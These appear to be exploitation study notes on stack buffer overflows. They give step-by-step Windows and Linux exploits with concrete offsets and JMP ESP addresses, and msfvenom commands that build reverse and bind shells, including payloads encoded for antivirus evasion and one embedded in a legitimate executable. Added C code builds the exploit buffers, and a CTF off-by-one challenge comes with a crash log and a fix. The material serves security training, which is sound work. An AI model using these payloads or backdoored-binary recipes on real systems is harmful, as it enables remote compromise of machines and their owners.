Buffer Overflow

Windows Buffer Overflows

  1. Test for controlling EIP: send a unique cyclic pattern, then look up the value that lands in EIP
  • pattern_create.rb -l 2700
  • pattern_offset.rb -q 39694438
  2. Verify the EIP offset (2606 here): the four "B"s must land in EIP and the "C"s at ESP
  • buffer = "A" * 2606 + "B" * 4 + "C" * 90
  3. Check for "bad characters"
  • After the EIP overwrite send every byte \x01-\xFF (\x00 is left out because it terminates the string), follow ESP in the debugger's memory dump and note each byte that is missing or altered; drop it from the test string and repeat until the dump matches what was sent
  4. Use Mona to find a module with no protections (Rebase, SafeSEH, ASLR and NXCompat all False)
  • !mona modules
  5. Locate a JMP ESP in a readable and executable page of that module. This only works when DEP is not enforced for the process: with DEP on, shellcode on the stack faults and a ROP chain is needed instead
  6. Use the Metasploit NASM shell to get the opcode bytes for JMP ESP
    /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
    nasm > JMP ESP
    00000000  FFE4              jmp esp
  7. Search the module for those opcode bytes with Mona in the Immunity Debugger command bar
    !mona find -s "\xff\xe4" -m slmfc.dll
  • Found at 0x5f4a358f; flip it around to little-endian format when placing it in the buffer
    buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "C" * 390
  8. Use msfvenom to create the payload, encoded and with the bad characters excluded
    msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
  9. Final payload with a NOP slide in front of the shellcode (the NOPs give the shikata_ga_nai decoder stub some room before the encoded bytes)
    buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "\x90" * 8 + shellcode
  10. Create a PE reverse shell
    msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f exe -o shell_reverse.exe
  11. Create a PE reverse shell and encode it 9 times with shikata_ga_nai
    msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -o shell_reverse_msf_encoded.exe
  12. Create a PE reverse shell and embed it into an existing executable
    msfvenom -p windows/shell_reverse_tcp LHOST=$ip LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
  13. Create a PE reverse HTTPS shell
    msfvenom -p windows/meterpreter/reverse_https LHOST=$ip LPORT=443 -f exe -o met_https_reverse.exe

Linux Buffer Overflows

  1. Run Evan's Debugger (edb) against the application
    edb --run /usr/games/crossfire/bin/crossfire
  2. Find the EIP offset and a JMP ESP address as in the Windows steps. Here ESP points toward the end of our buffer, so there is little room after the return address, while EAX points at the start of it. A short first stage placed at ESP therefore adds 12 to EAX (skipping the leading bytes) and jumps there, so the real shellcode can sit in the large part of the buffer. Get the opcodes from the NASM shell:
    nasm > add eax,12
    00000000  83C00C            add eax,byte +0xc
    nasm > jmp eax
    00000000  FFE0              jmp eax
  3. Check for "bad characters"
  • Send every byte \x01-\xFF and note which ones are missing or altered in the memory dump; these go into the msfvenom -b list below
  4. Find a JMP ESP address
    "\x97\x45\x13\x08"  # found at address 08134597, written little-endian
  5. Build the crash buffer: padding, the JMP ESP address, then the first stage followed by two NOPs
    crash = "\x41" * 4368 + "\x97\x45\x13\x08" + "\x83\xc0\x0c\xff\xe0\x90\x90"
  6. Generate the bind-shell payload, excluding the bad characters found
    msfvenom -p linux/x86/shell_bind_tcp LPORT=4444 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai
  7. Connect to the shell with netcat
    nc -v $ip 4444
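The offset lookup and buffer assembly used in both the Windows and the Linux steps above, as an added C example (not code from these notes or from the tools they mention): pattern_create / pattern_offset are re-implemented, a bad-character probe string is generated, and the two target buffers are assembled with the return address written little-endian. Offsets and addresses are the ones quoted above (2606 and 0x5f4a358f for the Windows target, 4368 and 0x08134597 for crossfire); the Windows shellcode is a placeholder of four int3 bytes standing in for the msfvenom -f c output, and the code assumes an x86 little-endian target.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Metasploit-style cyclic pattern "Aa0Aa1Aa2...": no 4-byte window repeats
 * within the first 20280 bytes, so the value in EIP maps to exactly one offset. */
size_t pattern_create(unsigned char *out, size_t len)
{
    size_t n = 0;
    for (int u = 'A'; u <= 'Z'; u++)
        for (int l = 'a'; l <= 'z'; l++)
            for (int d = '0'; d <= '9'; d++) {
                if (n < len) out[n++] = (unsigned char)u;
                if (n < len) out[n++] = (unsigned char)l;
                if (n < len) out[n++] = (unsigned char)d;
                if (n >= len) return n;
            }
    return n;
}

/* pattern_offset: EIP as the debugger shows it (0x39694438) was loaded
 * little-endian, so the bytes in the buffer were 38 44 69 39 = "8Di9".
 * Returns the offset inside a pattern of `len` bytes, or -1 if not present. */
long pattern_offset(uint32_t eip, size_t len)
{
    unsigned char *pat = malloc(len);
    if (!pat) return -1;
    size_t n = pattern_create(pat, len);
    unsigned char needle[4] = { eip & 0xff, (eip >> 8) & 0xff,
                                (eip >> 16) & 0xff, (eip >> 24) & 0xff };
    long off = -1;
    for (size_t i = 0; i + 4 <= n; i++)
        if (memcmp(pat + i, needle, 4) == 0) { off = (long)i; break; }
    free(pat);
    return off;
}

/* Bad-character probe: \x01..\xff minus the bytes already known to be bad.
 * \x00 is left out up front because it terminates the string in most targets. */
size_t badchar_probe(unsigned char *out, const unsigned char *exclude, size_t nexclude)
{
    size_t n = 0;
    for (int b = 1; b < 256; b++) {
        int bad = 0;
        for (size_t i = 0; i < nexclude; i++)
            if (exclude[i] == b) bad = 1;
        if (!bad) out[n++] = (unsigned char)b;
    }
    return n;
}

/* filler * offset | return address (little-endian) | first stage or NOP sled | payload */
size_t build_buffer(unsigned char *out, size_t cap, size_t offset, unsigned char filler,
                    uint32_t ret_addr, const unsigned char *stage, size_t stage_len,
                    const unsigned char *payload, size_t payload_len)
{
    if (offset + 4 + stage_len + payload_len > cap) return 0;
    memset(out, filler, offset);
    size_t n = offset;
    for (int i = 0; i < 4; i++)                 /* same as struct.pack("<I", ret_addr) */
        out[n++] = (unsigned char)(ret_addr >> (8 * i));
    if (stage_len)   { memcpy(out + n, stage, stage_len);     n += stage_len; }
    if (payload_len) { memcpy(out + n, payload, payload_len); n += payload_len; }
    return n;
}

unsigned char probe_buf[255];
unsigned char win_buf[4096];
unsigned char lin_buf[8192];

/* Windows target from the notes: offset 2606, JMP ESP in slmfc.dll at 0x5f4a358f,
 * an 8-byte NOP sled, then the shellcode (placeholder int3 bytes here). */
size_t build_windows_buffer(void)
{
    unsigned char nops[8];
    memset(nops, 0x90, sizeof nops);
    static const unsigned char shellcode[] = "\xcc\xcc\xcc\xcc"; /* placeholder for msfvenom -f c output */
    return build_buffer(win_buf, sizeof win_buf, 2606, 'A', 0x5f4a358f,
                        nops, sizeof nops, shellcode, 4);
}

/* Linux crossfire target from the notes: 4368 bytes of 0x41, JMP ESP at 0x08134597,
 * then the first stage "add eax,12 ; jmp eax" followed by two NOPs. */
size_t build_linux_buffer(void)
{
    static const unsigned char stage[] = "\x83\xc0\x0c\xff\xe0\x90\x90";
    return build_buffer(lin_buf, sizeof lin_buf, 4368, 0x41, 0x08134597,
                        stage, 7, NULL, 0);
}

int main(void)
{
    printf("EIP offset for 0x39694438: %ld\n", pattern_offset(0x39694438, 2700));
    size_t np = badchar_probe(probe_buf, (const unsigned char *)"\x0a\x0d", 2);
    printf("bad-char probe: %zu bytes (\\x00, \\x0a, \\x0d excluded)\n", np);
    printf("windows buffer: %zu bytes, linux buffer: %zu bytes\n",
           build_windows_buffer(), build_linux_buffer());
    return 0;
}
```

The pattern_offset result has to come out at 2606 before the rest of the buffer is worth sending; whatever badchar_probe emits is sent after the EIP overwrite, and the bytes the dump shows as mangled are added to the exclude list (and to msfvenom's -b) until the dump matches.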

One Byte Overflow

Vulnerable Code:

    #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>

    struct B2 {
        int (*ptr)();
        char c[128];
    };

    struct B1 {
        char data[16];        // 16 bytes: data[16] is the first byte of myStruct
        struct B2 *myStruct;
        char data2[128];
    };

    void secret() {
        printf("Game 0ver! You win :P\n");
    }

    void function() {
        printf("Everything is fine.\n");
    }

    int main(int argc, char *argv[]) {
        printf("\033[1mWelcome to ROPLevel7 by @bellis1000!\nThis level involves exploiting an off-by-one vulnerability.\n\n\x1b[0m");
        if (argc < 3) {
            printf("Usage: %s <data> <block_data>\n", argv[0]);
            exit(0);
        }

        struct B1 *s = malloc(256);
        s->myStruct = malloc(256);
        s->myStruct->ptr = function;
        strncpy(s->myStruct->c, argv[2], 126);
        strncpy(s->data2, argv[2], 126);

        // this is where the off-by-one bug occurs: i <= 16 allows a 17th write, into data[16]
        for (int i = 0; i <= 16; i++) {
            if (argv[1][i] != 0) {
                s->data[i] = argv[1][i];
            } else {
                break;
            }
        }

        // call function pointer
        s->myStruct->ptr();
        return 0;
    }

Build it as the challenge intends (no stack protector, no -O flag) and crash it under pwndbg with a 17-byte first argument and a long second one:

    gcc -fno-stack-protector -o roplevel7 roplevel7.c

    pwndbg> run AAAAAAAAAAAAAAAAA BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
    Starting program: /home/generalzero/Downloads/Exploit-Challenges-master/ROPLevel7/roplevel7 AAAAAAAAAAAAAAAAA BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
    Welcome to ROPLevel7 by @bellis1000!
    This level involves exploiting an off-by-one vulnerability.

    Breakpoint 1, 0x00005555555552cb in main ()
    pwndbg> c
    Continuing.

    Program received signal SIGSEGV, Segmentation fault.
    0x0000004242424242 in ?? ()
    LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    [ REGISTERS ]
     RAX  0x0
     RBX  0x0
     RCX  0x41
     RDX  0x4242424242
     RDI  0x55555555973f ◂— 0x42424242424242 /* 'BBBBBBB' */
     RSI  0x7fffffffe170 ◂— 0x4242424242424242 ('BBBBBBBB')
     R8   0x7
     R9   0x7ffff7f8ba60 (main_arena+96) —▸ 0x5555555598c0 ◂— 0x0
     R10  0x18
     R11  0x7ffff7f51d80 ◂— 0xfff1c580fff1c570
     R12  0x555555555080 (_start) ◂— endbr64
     R13  0x0
     R14  0x0
     R15  0x0
     RBP  0x7fffffffdc60 —▸ 0x5555555552e0 (__libc_csu_init) ◂— endbr64
    *RSP  0x7fffffffdc38 —▸ 0x5555555552cd (main+302) ◂— mov eax, 0
    *RIP  0x4242424242
    [ DISASM ]
    Invalid address 0x4242424242

The 17th byte of argv[1] lands in data[16], which is the least significant byte of myStruct, so the pointer is bent to a nearby heap address that is filled with the "B"s copied into c[] and data2; the call through ptr then loads 0x4242424242 into RIP. Note RCX still holds 0x41, the last byte the loop copied.
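An added example (not part of the challenge source above) that isolates the off-by-one and puts the hardened loop beside it. It uses the same two structs, copies a 16- and a 17-byte argv[1]-style string with the challenge's `i <= 16` loop and with a corrected `i < sizeof data` loop, and reports the low byte of myStruct afterwards instead of calling through it. It assumes a little-endian build and should be compiled the way the challenge is (gcc with no -O flag); the copier functions are marked noinline so the store and the pointer check stay in separate functions and an optimizer cannot fold the out-of-bounds store into the comparison.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Same layout as the challenge: on x86_64 (and i386) `data` fills bytes 0..15,
 * so the pointer `myStruct` starts at byte 16. */
struct B2 { int (*ptr)(void); char c[128]; };
struct B1 { char data[16]; struct B2 *myStruct; char data2[128]; };

static int function(void) { printf("Everything is fine.\n"); return 0; }

/* The challenge's loop: i runs 0..16 inclusive, 17 iterations over a 16-byte
 * array. With a 17-byte source, data[16] (the low byte of myStruct) is overwritten. */
__attribute__((noinline)) void copy_vulnerable(struct B1 *s, const char *src)
{
    for (int i = 0; i <= 16; i++) {
        if (src[i] != 0)
            s->data[i] = src[i];
        else
            break;
    }
}

/* Hardened loop: the bound is the array's own size and the terminator check is
 * part of the condition, so neither data[16] nor anything past it is touched. */
__attribute__((noinline)) void copy_fixed(struct B1 *s, const char *src)
{
    for (size_t i = 0; i < sizeof s->data && src[i] != 0; i++)
        s->data[i] = src[i];
}

size_t myStruct_offset(void) { return offsetof(struct B1, myStruct); }

/* Runs `copier` on a fresh pair of heap objects and reports the low byte of
 * s->myStruct afterwards. The pointer is inspected, never called: calling it is
 * what produced the RIP=0x4242424242 crash above. Returns 0x100 on allocation failure. */
unsigned low_byte_after_copy(void (*copier)(struct B1 *, const char *), const char *src)
{
    struct B1 *s = calloc(1, sizeof *s);
    struct B2 *b2 = calloc(1, sizeof *b2);
    if (!s || !b2) { free(s); free(b2); return 0x100; }
    s->myStruct = b2;
    b2->ptr = function;
    copier(s, src);
    unsigned lo = (unsigned)((uintptr_t)s->myStruct & 0xff);
    free(b2);                 /* free the real object, not the possibly bent pointer */
    free(s);
    return lo;
}

/* 1 if the copy left myStruct pointing at the original object, 0 if it changed. */
int pointer_intact_after_copy(void (*copier)(struct B1 *, const char *), const char *src)
{
    struct B1 *s = calloc(1, sizeof *s);
    struct B2 *b2 = calloc(1, sizeof *b2);
    if (!s || !b2) { free(s); free(b2); return -1; }
    s->myStruct = b2;
    b2->ptr = function;
    copier(s, src);
    int intact = (s->myStruct == b2);
    free(b2);
    free(s);
    return intact;
}

int main(void)
{
    const char *sixteen   = "AAAAAAAA" "AAAAAAAA";      /* 16 bytes: loop stops on the terminator */
    const char *seventeen = "AAAAAAAA" "AAAAAAAA" "A";  /* 17 bytes: data[16] is written */
    printf("offsetof(struct B1, myStruct) = %zu\n", myStruct_offset());
    printf("vulnerable, 16 bytes: intact=%d\n", pointer_intact_after_copy(copy_vulnerable, sixteen));
    printf("vulnerable, 17 bytes: low byte of myStruct = 0x%02x\n",
           low_byte_after_copy(copy_vulnerable, seventeen));
    printf("fixed,      17 bytes: intact=%d\n", pointer_intact_after_copy(copy_fixed, seventeen));
    return 0;
}
```

The low byte comes back as 0x41 ('A') for the vulnerable copy of 17 bytes, which is exactly the value sitting in RCX in the crash above; because glibc hands out 16-byte-aligned chunks, the original low byte can never be 0x41, so the check is unambiguous. The fixed loop leaves the pointer untouched for any input length.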